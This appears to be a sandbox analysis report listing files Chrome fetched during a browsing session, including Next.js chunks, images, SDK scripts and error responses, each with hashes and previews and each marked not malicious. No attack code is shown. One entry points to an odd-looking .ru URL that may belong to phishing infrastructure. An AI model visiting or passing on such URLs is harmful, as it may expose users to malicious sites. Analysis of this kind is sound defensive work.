                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7245],{53160:function(e,t,n){"use strict";var r=n(4410);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e}).apply(this,arguments)}t.Z=function(e){return r.createElement("svg",a({xmlns:"http://www.w3.org/2000/svg","data-name":"\\u56FE\\u5C42 1",viewBox:"0 0 1024 1024"},e),r.createElement("defs",null,r.createElement("clipPath",{id:"X_svg__a"},r.createElement("path",{d:"M139.64 139.64h744.73v760.78H139.64z",style:{fill:"none"}}))),r.createElement("g",{style:{clipPath:"url(#X_svg__a)"}},r.createElement("path",{d:"m582.85 461.61 277.24-321.97h-65.7L553.66 419.2 361.4 139.64H139.64l290.75 422.75-290.75 337.63h65.7l254.22-295.23 203.05 295.23h221.76L582.84 461.6h.01Zm-89.99 104.5-29.46-42.1-234.39-334.96h100.91l189.16 270.33 29.46 42.1 245.89 351.38H693.52L492.87 566.13v-.02Z",style:{fi
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (51757), with no line terminators
                                      Category:downloaded
                                      Size (bytes):51757
                                      Entropy (8bit):5.198621497470171
                                      Encrypted:false
                                      SSDEEP:768:iqLP0aH65H0/P0J+U7MBumlLJUcomN2KPD8:i7hy/PcwLJzG
                                      MD5:E2BE0EDA039246D494694FE5C9452711
                                      SHA1:6F8C00B746F34C9C803C6FA72FA87654665AC809
                                      SHA-256:4A094BB03D629E4DD5489569D1BFF2FEEB1710BB819903151E1AB15E574ADAC9
                                      SHA-512:EB69AA6FD278805CDCCEB524AF7DBA23A0A6B25CD53BD13CD925518A811274F2A40FC6236999B8BEE8FD6D74D698E633CB1FF40973DE1F7672E3F8E0ADE2F498
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/2975-ce09eb5a148c4bb7.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2975],{94781:function(t,s,o){var y={"./ar/translation.json":[64887,4887],"./de/translation.json":[74812,4812],"./en/translation.json":[83194,3194],"./es/translation.json":[32682,2682],"./fil/translation.json":[28511,8511],"./fr/translation.json":[55412,5412],"./hi/translation.json":[37062,7062],"./id/translation.json":[70089,5513],"./it/translation.json":[79620,9620],"./ja/translation.json":[11032,1032],"./ko/translation.json":[38320,8320],"./ms/translation.json":[40091,91],"./nl/translation.json":[39421,9421],"./pt/translation.json":[23893,3893],"./ru/translation.json":[1981,1981],"./th/translation.json":[26544,6544],"./tr/translation.json":[90371,371],"./vi/translation.json":[49880,9880],"./yue/translation.json":[50402,402],"./zh/translation.json":[48246,8246],"./zh_tw/translation.json":[94042,4042]};function x(t){if(!o.o(y,t))return Promise.resolve().then(function(){var s=Error("Cannot find module '"+t+"'");throw s.code="MODUL
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:dropped
                                      Size (bytes):1368
                                      Entropy (8bit):4.70705937388994
                                      Encrypted:false
                                      SSDEEP:24:t415iiBuP4tc71a/AfsEadFRai+WbQM0L+bG65e7/hH/h2F5DbDpoEO26o:CRBubpassHdrai+EX0L+k7/BYFtb9oXo
                                      MD5:D09CC53D7D35A62A2E85BC223D50BB1E
                                      SHA1:9C6F65F0991E6406A3BC4ABB6784679214909FF0
                                      SHA-256:4D88657FF48D595EEC199746B2C9CA59F0EE7D679478B90B1F41EE4438282F59
                                      SHA-512:5B492713D59A765A7D3288E500364FCDB6DD6EE3A8714D8C0EC76F91F43290E8E6CC007260733E2982BF521934DD1377E7C0FAE6F0879EE94E9469B5F193DA95
                                      Malicious:false
                                      Reputation:low
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 841.89 477.45"><defs><style>.cls-1 {fill: #ffb939; }.cls-2 {fill: #b6a0ff;}.cls-3 {fill:#180b00;}</style></defs><path class="cls-1" d="M346.63,437.6c85.07,34.2,190.98-61.84,315.22,22.73,77.2,52.56,179.69-14.19,180.04-224.3,.21-125.12-86.87-230.42-216.5-235.35-147.52-5.61-199.26,100.18-243.56,209.88-20.71,51.28-93.09,203.77-35.2,227.04Z"/><circle class="cls-3" cx="628.33" cy="205.03" r="16.25"/><circle class="cls-3" cx="493.72" cy="171.28" r="16.25"/><path class="cls-3" d="M558.24,237.21c-13.07,0-28.81-4.66-41.32-22.41-1.14-1.62-.75-3.85,.86-4.99,1.61-1.14,3.85-.75,4.99,.86,22.56,32.01,56.35,15.22,57.78,14.49,1.75-.9,3.92-.21,4.82,1.55,.9,1.76,.22,3.91-1.54,4.82-.21,.11-11.31,5.68-25.6,5.68Z"/><g><path class="cls-2" d="M384.02,438.67c-60.88,16.58-67.98-63.27-218.07,27.14C114.09,497.05,10.75,431.37,.52,258.33-7.44,123.85,77.31,13.47,200.26,1.15h0c122.95-12.33,225.06,76.14,248.86,205.61,21.95,119.46-19.67,219.54-65.1,231.91Z"/><circle c
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (59695), with no line terminators
                                      Category:downloaded
                                      Size (bytes):59695
                                      Entropy (8bit):5.258380729471525
                                      Encrypted:false
                                      SSDEEP:768:k2FvzdEOaF1yl18GxXTNBLJ9XXVEw+ryKD1XELrxf1jBnrBw8mC2q6:TZzdEZyl18oXuyK10fzwdh
                                      MD5:2C832C971E94396F2F61EB309162F841
                                      SHA1:FBD332F01D072E376EB7D4E3C41DDC8C08623224
                                      SHA-256:B17846CDF83FED2900255B722423B54C61189CDCF67F4EEF474FCFC917704365
                                      SHA-512:DD266E258289E3263C6D6A9A9530B871A66CF15406FB388DC2409E1148E322919226D7D215186241461069EF44E2265B87CA5DBDCFCDF806ED0A708A837718D8
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/6219-1457be36132bf9c6.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6219],{71028:function(e,t,r){r.d(t,{$s:function(){return $},BH:function(){return w},L:function(){return l},LL:function(){return A},Pz:function(){return b},ZR:function(){return T},aH:function(){return m},b$:function(){return E},eu:function(){return C},hl:function(){return S},m9:function(){return R},ne:function(){return B},pd:function(){return F},q4:function(){return g},ru:function(){return I},tV:function(){return u},uI:function(){return y},vZ:function(){return function e(t,r){if(t===r)return!0;let n=Object.keys(t),i=Object.keys(r);for(let a of n){if(!i.includes(a))return!1;let n=t[a],s=r[a];if(L(n)&&L(s)){if(!e(n,s))return!1}else if(n!==s)return!1}for(let e of i)if(!n.includes(e))return!1;return!0}},w1:function(){return _},xO:function(){return k},xb:function(){return M},z$:function(){return v},zI:function(){return D},zd:function(){return P}});var n=r(25566);let i=function(e){let t=[],r=0;for(let n=0;n<e.length;n++){le
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.947846871207472
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiRE3/yqXXl6E6FPXn:UrXi8aqX1IX
                                      MD5:D1F01ACEAF626DB84FF56876395EDFAD
                                      SHA1:4EB8199137B60E27E7B93A167FEBE6426FBA4647
                                      SHA-256:3F27DC5ED6A0756882A6011594112B55AA7146E2575ED670723E2EBC2A772028
                                      SHA-512:E8934ADF67293916E59CBB3FDDDBACBEBC8548EE97A1A02E28AFB49F57C9D87EC5E821D2AF2F4D82213D1FF3ADB7070CFEFBB2BA1E53EA0EA51D5F98C72B78AC
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1430591912343977668&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__5
                                      Preview:/**/ typeof branch_callback__5 === 'function' && branch_callback__5("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (7291)
                                      Category:downloaded
                                      Size (bytes):11954
                                      Entropy (8bit):5.18396210082209
                                      Encrypted:false
                                      SSDEEP:96:dy+cz20pvj2j5NgeujJHAml0S352/5BACD0cTWSVHc6sFlZiurvci4FxrKEbNE0a:dyzpSrCemJ3Av6
                                      MD5:92AA2BCD9F5A334B342404224B0E749F
                                      SHA1:85EA70AEAF4F50274956A0330B495603AAC8E3B5
                                      SHA-256:C6AF3D9AB6FE6B8CFAA64AAE3054E26049A97FE4C17669F0210BC22E4922C9B6
                                      SHA-512:FE873B22658E726D871D15F7DD06FEFE7DEDF11A02C477DC155B86E04988E1E0BA69A40D123605105E3AC5A971835CCC73FA4A042B5DA7CB13838ED2C38121D3
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/?_rsc=1lgr1
                                      Preview:2:I[66513,[],"ClientPageRoot"].3:I[54404,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","6313","static/chunks/app/(layout)/(PALayout)/home/page-7286f55068b8b827.js"],"default",1].4:I[39275,[],""].5:I[61343,[],""].6:I[13165,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","7487","static/chunks/49a1bf4b-d76374957333b5fc.js","595","static/chunks/595-09c9610e33be8fcc.js","5681","static/chunks/5681-43d82f1a3d805e0d.js","3122","static/chunks/3122-1f6938ed37fcf02d.js","4653","static/chunks/4653-73048479d8c69d09.js","6219","static/chunks/6219-1457be36132bf9c6.js","1073","static/chunks/1073-e4f77f384144a1c4.js","9818","static/chunks/9818-2cef5ca4ed1a1e3a.js","6701","static/chunks/6701-3887d30af462f285.js","9578","static/chunks/9578-a4316cb78831d4a3.js","4059","static/chunks/4059-ff6b23f1a12feb76.js","1025","static/chunks/1025-e8953ee90888594c.js","4595","static/chunks/4595-19c1c19690f67e9a.js","3927","static/chunks/3927-bc012ff258351a6d.js","4871","static/chunks/4871-53f67f62764665d5.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 1754 x 1754, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):47226
                                      Entropy (8bit):7.198080079299587
                                      Encrypted:false
                                      SSDEEP:768:0oPN7qxA+UlrAuBxL2T5Xkerbr/GPJYNPGXfR6ieq5E:06ueNhLslrbbOOPGPrE
                                      MD5:C808ED2E474C484C7A7FAF992EFA7D74
                                      SHA1:DDF51639071B4D53AD13CB8ED884CD4EECDABE8F
                                      SHA-256:063E9B4C9BAA0706F0DA5521CABA32A8EB318646A78E15B1074FDA848CEAD675
                                      SHA-512:DEF9D0CA7B16B85342E5149B2149CB9395C6B01117E723A44DF45C77D0C7BC3C484E5453CE0274F6A4520804A5001504445EB1C6FA260FFFDFA8AF3721253295
                                      Malicious:false
                                      Reputation:low
                                      Preview:.PNG........IHDR.............Kx......pHYs..........&.?.. .IDATx...1r[W....v..5.q.R.D.P.....4=..G....g.....IC..+...9...."%[..H`..<O.K..`..z.^..........................m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):79
                                      Entropy (8bit):4.403941477424042
                                      Encrypted:false
                                      SSDEEP:3:YIzKK8LLRexA8KLClX3H8//XSI:YI1oLYxk2FM//J
                                      MD5:8230ECCF989074390F935CC383BAFABD
                                      SHA1:95CD7FD09BC5D7B7C4865DAFE4B8634ADE10F4ED
                                      SHA-256:EAA1A0FFB1B0087272EC7F726239E339CB8A1CD6EC00C2E73C6E4BD47E98F4A8
                                      SHA-512:88508CB1A00D742610453B62621DCCA4B1B2F095F4D093A04007C3AF7D5F6CD89B9C7A4864B9086EC4008FEB84ADE46251C9697F56A71B1EE303DEDC94F0AF8F
                                      Malicious:false
                                      Reputation:low
                                      Preview:{"message":"Oops, something went wrong.","code":1,"subCode":"unexpected.error"}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:very short file (no magic)
                                      Category:downloaded
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:low
                                      URL:https://lm24x.viugbu.ru/bhanchod@5swlze
                                      Preview:1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (65521), with no line terminators
                                      Category:downloaded
                                      Size (bytes):65891
                                      Entropy (8bit):5.2812344502925
                                      Encrypted:false
                                      SSDEEP:768:IPOUEskM+++yhydtKHOPunI8rIYWXEo2eT8PEkJg48jCw8EItkxo81:NsHXrO0QEo2eT8ElAXC1
                                      MD5:C488EF7D358396CFC441F4D13A62B746
                                      SHA1:A23EFFCED1310664E479D22AE634EE299999B46A
                                      SHA-256:D421ABB8362F043647EC6EC9A47303CFBD7D04D6AB6206FEFFF85F08AE3D3D07
                                      SHA-512:3FCBF3488A8AAC679A15504021E3D809D448DD347393692F009B8EDA9F684334A22222EA1A07A6F972AC6C4F47EC619AA42F9BEF4CBDE60A96E0BCC58ED010B5
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/89f647f8a4ae7bbe.css
                                      Preview:.index_markdown__dv5W0{position:relative;width:100%;color:#2f2f40;font-weight:400;font-size:17px;line-height:30px;word-break:break-word}.index_markdown__dv5W0 a::-moz-selection,.index_markdown__dv5W0 code::-moz-selection,.index_markdown__dv5W0 em::-moz-selection,.index_markdown__dv5W0 fade-in-text::-moz-selection,.index_markdown__dv5W0 h1::-moz-selection,.index_markdown__dv5W0 h2::-moz-selection,.index_markdown__dv5W0 h3::-moz-selection,.index_markdown__dv5W0 h4::-moz-selection,.index_markdown__dv5W0 h5::-moz-selection,.index_markdown__dv5W0 h6::-moz-selection,.index_markdown__dv5W0 li::-moz-selection,.index_markdown__dv5W0 p::-moz-selection,.index_markdown__dv5W0 s::-moz-selection,.index_markdown__dv5W0 span::-moz-selection,.index_markdown__dv5W0 strong::-moz-selection,.index_markdown__dv5W0 td::-moz-selection,.index_markdown__dv5W0 th::-moz-selection{background:rgba(169,157,245,.4)}.index_markdown__dv5W0 a::selection,.index_markdown__dv5W0 code::selection,.index_markdown__dv5W0 em::s
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (48238)
                                      Category:downloaded
                                      Size (bytes):48239
                                      Entropy (8bit):5.343270713163753
                                      Encrypted:false
                                      SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                      MD5:184E29DE57C67BC329C650F294847C16
                                      SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                      SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                      SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                      Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):248
                                      Entropy (8bit):4.7095712973278365
                                      Encrypted:false
                                      SSDEEP:6:v/+ayB3jHZ/HM1aszA1DyF8bMFK3DsQkHY1Re1MxK10:uBjHZ/HM1aszA1+F8bjLkHYq1CV
                                      MD5:8C4C7804C239ACEA89A1A11804589CE5
                                      SHA1:3E4D60649634D333E02695BB657B05E6A0BFF121
                                      SHA-256:DA4B1CE0A6833588F4A9BD24350C9F16C31426D439F92B3342B43BFFEC6667C2
                                      SHA-512:DB1FEFC6ACF6BD213F147CFCB79CD1864DE90ED5705D1020FC472F0CB62C590807D7D1C4453BF43AD9F7300EE3D89DD5DF5D03D9B2B9909C5458C9D64368FE92
                                      Malicious:false
                                      Reputation:low
                                      Preview:{. "error": {. "code": 403,. "message": "Method doesn't allow unregistered callers (callers without established identity). Please use API Key or other form of API consumer identity to call this API.",. "status": "PERMISSION_DENIED". }.}.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:dropped
                                      Size (bytes):18391261
                                      Entropy (8bit):7.92549159103102
                                      Encrypted:false
                                      SSDEEP:393216:IdWKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXw:FKXKXKXKXKXKXKXKXKXKXKXKXKXKXKXt
                                      MD5:91CB327F2E3688E1BF4E4AB2F8315DC9
                                      SHA1:3539A91624C57F0497F3D0748A9EC05980D7A770
                                      SHA-256:8FC48E857A97CA0A6CC325729858A2340932EC445A1E265788F6FC969F114756
                                      SHA-512:8540C627A1E18C9C9E09C34FDAA89771705ECBE06F07E7AC793004CD4F67E8B85146E0BCA2C7E854090F3DAC2EDA5439A08FE1372ACC88153B8473CF600993E9
                                      Malicious:false
                                      Reputation:low
                                      Preview:GIF89a.......L5-`X....-d{!.....J]..&..c........P*.......yy{.......+..x.~mP........uxVK._...f^@...e:1wyg.D)vo..b0zvE.n.LghzSO0.k....d9.Vk3..kW4..('"...1))...=**2) 3!!>).tjZ...<4(d;S...?23vif1.2..........hnAwJ=......hfVQ>;hegaNAfWVvos............R>9>J...aXf.N@.dR....bBvV[...PNL....ow.pf.........YS...KSi....u..c..xZUV.iPx....a.aB*.x.....4...}D.vC#.IO....*.yW.r`..L>.xE..............!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:FC0562B6CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:FC0562B7CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):83975
                                      Entropy (8bit):5.239513334226474
                                      Encrypted:false
                                      SSDEEP:1536:0s5J44jLKKVXuehOLhN2LxMU9XAgRK6xD4UZ4riyyw0hk:0sfnAgRK6XNyywN
                                      MD5:933C7A0EAF456B797F2DAEE3D707F275
                                      SHA1:E7180157E996C9E1F9F52C225A1449D0F8E09F6A
                                      SHA-256:D33943FE1D202D6E36047613DB8D886312A83B4F172B5D7CF80C4E840CD537A2
                                      SHA-512:D0C04E271CCF5A0078E09C303529E941FE0130C6369DFB5F7997D4B7D3FF4395257D15D301356B85E8D4196C2F46E934BF3821999ED740710CC441E8FCD4DD82
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/49a1bf4b-d76374957333b5fc.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7487],{44897:function(e,t,n){n.d(t,{X:function(){return eQ},Z:function(){return eY},a1:function(){return e7},a5:function(){return ts},a6:function(){return ta},a7:function(){return to},a9:function(){return tc},aa:function(){return tu},ab:function(){return th},ag:function(){return td},c:function(){return tH},o:function(){return n_}});var r,i=n(71028),s=n(99279),a=n(19053),o=n(11735),l=n(42680);function c(){return{"dependent-sdk-initialized-before-auth":"Another Firebase SDK was initialized and is trying to use Auth before Auth is initialized. Please be sure to call `initializeAuth` or `getAuth` before starting any other Firebase SDK."}}let u=new i.LL("auth","Firebase",c()),h=new a.Yd("@firebase/auth");function d(e,...t){h.logLevel<=a.in.ERROR&&h.error(`Auth (${s.Jn}): ${e}`,...t)}function p(e,...t){throw g(e,...t)}function f(e,...t){return g(e,...t)}function m(e,t,n){let r=Object.assign(Object.assign({},c()),{[t]:n});r
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):937
                                      Entropy (8bit):7.737931820487441
                                      Encrypted:false
                                      SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                      MD5:FC3B7BBE7970F47579127561139060E2
                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                      Malicious:false
                                      Reputation:low
                                      Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (64424), with no line terminators
                                      Category:downloaded
                                      Size (bytes):198785
                                      Entropy (8bit):5.37302358554092
                                      Encrypted:false
                                      SSDEEP:6144:64CmwjV5lrU1f+UPbqyYf2q7iqHOEbEPtUlEeWwr:64J5eyCXR
                                      MD5:4A89A5D2378F672F166399FDFAEC67C1
                                      SHA1:4C84A8DA37C7E6615BD111D3604524098C6AFE04
                                      SHA-256:6AE1FB4A07134CF8E03F07B2397CCB989B34E584791E7E0FEDCC198589B4BC89
                                      SHA-512:6DC73D5A2636CD12A97763104C51ED1287FFB360ED7E2022EE0B620745AF74BAF6CF0553DE581FCB52F9B010F2F04361E6AD285057123376CD57BB9CB87ACA9F
                                      Malicious:false
                                      Reputation:low
                                      URL:https://do.featurebase.app/js/sdk.js
                                      Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("FeaturebaseSDK",[],t):"object"==typeof exports?exports.FeaturebaseSDK=t():e.FeaturebaseSDK=t()}(this,(()=>(()=>{var e,t,i={702:(e,t)=>{var i,n,a;!function(s){if("undefined"!=typeof window){var r,o=0,l=!1,d=!1,c=7,u="[iFrameSizer]",h=u.length,f=null,p=window.requestAnimationFrame,m=Object.freeze({max:1,scroll:1,bodyScroll:1,documentElementScroll:1}),g={},v=null,y=Object.freeze({autoResize:!0,bodyBackground:null,bodyMargin:null,bodyMarginV1:8,bodyPadding:null,checkOrigin:!0,inPageLinks:!1,enablePublicMethods:!0,heightCalculationMethod:"bodyOffset",id:"iFrameResizer",interval:32,log:!1,maxHeight:1/0,maxWidth:1/0,minHeight:0,minWidth:0,mouseEvents:!0,resizeFrom:"parent",scrolling:!1,sizeHeight:!0,sizeWidth:!1,warningTimeout:5e3,tolerance:0,widthCalculationMethod:"scroll",onClose:function(){return!0},onClosed:function(){},onInit:function(){},onMessage:function(){
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.924771426480989
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiREFYo1yqXXl6ECUwVJFPXn:UrXimPwqX1/UX
                                      MD5:C9EB229EE34AFC0ABF2361B805531366
                                      SHA1:65234EECD630F705EE5A46B29CDF60B82250A203
                                      SHA-256:2C1EA2EE42C84CC769C0DAA3E511D781FC88AE53D1B90D58D73F5967F962932D
                                      SHA-512:22BC4B4BB7CC3FFA5DB2C487ADAEC40A5A30C46552A4DF2F5CE59BD41E70497EFD8A6E3FBE4EB55243ABFF1D767A1008D15AB4B8148F9B4E8762C639627B0285
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1430591912343977668&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__1
                                      Preview:/**/ typeof branch_callback__1 === 'function' && branch_callback__1("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:dropped
                                      Size (bytes):16348702
                                      Entropy (8bit):7.96642045892782
                                      Encrypted:false
                                      SSDEEP:393216:V8e097ZlzjQ/NhYxaTEy1t2HKvPod5fIGlunrqGbRzRCfYYYL:Vn0j5jQN1TEy1+sPUmrq2zRCfYYYL
                                      MD5:2E26DFC315ABB870CBC902C88D5305B2
                                      SHA1:B8DCE1B347263C616A7DC66AB91341F555E0F468
                                      SHA-256:29B52FEB08AA933798F490A92AE6AD661CF22D2E3D2D8E29236C633D73BF9FBC
                                      SHA-512:3E9CF7596BF40C1BADC4D8163177D8C5FD51B6736C305189B7084610D9DF42CAE1815878C367D33DE87CD3AA475D034B36D6A2887CC6C702204EC3C073ACB0BB
                                      Malicious:false
                                      Reputation:low
                                      Preview:GIF89a.........s..ROQ.pS....j.....#..zXHoG6OBD.Y<.n......E<:...:89..h?T...y...X:+....slfe......Z.{5'%...L-...o....w...5 ...qD2,.....3.k.b....c....j.{Z.c" !|z|.........))*..........k....c.......!)!'.........tss..............D($.........:1)[Z[........{Z.kW....................................~kt1-2}k.`MC.xd.....C..gOW..fvM^.Wa...wS......}...._.k.........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:B5AD7887CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:B5AD7888CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
